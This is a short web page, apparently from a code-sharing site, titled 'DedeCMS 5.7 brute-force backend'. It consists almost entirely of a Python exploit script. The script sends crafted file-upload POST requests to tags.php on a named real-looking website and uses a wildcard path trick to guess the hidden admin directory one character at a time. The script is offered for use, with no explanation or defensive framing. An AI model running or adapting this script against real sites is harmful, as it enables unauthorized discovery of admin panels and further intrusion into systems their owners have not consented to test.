dede 5.7 爆后台

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

#!/usr/bin/env python   import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = "" flag = 0 url = "http://www.rensheng5.com/tags.php" data = {     "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",     "_FILES[mochazz][name]" : 0,     "_FILES[mochazz][size]" : 0,     "_FILES[mochazz][type]" : "image/gif" }   for num in range(1,7):     if flag:         break     for pre in itertools.permutations(characters,num):         pre = ''.join(list(pre))         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)         print("testing",pre)         r = requests.post(url,data=data)         if "Upload filetype not allow !" not in r.text and r.status_code == 200:             flag = 1             back_dir = pre             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"             break         else:             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("[+] pre:",back_dir) flag = 0 for i in range(30):     if flag:         break     for ch in characters:         if ch == characters[-1]:             flag = 1             break         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)         r = requests.post(url, data=data)         if "Upload filetype not allow !" not in r.text and r.status_code == 200:             back_dir += ch             print("[+] ",back_dir)             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"             break         else:             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"   print("admin url:",back_dir)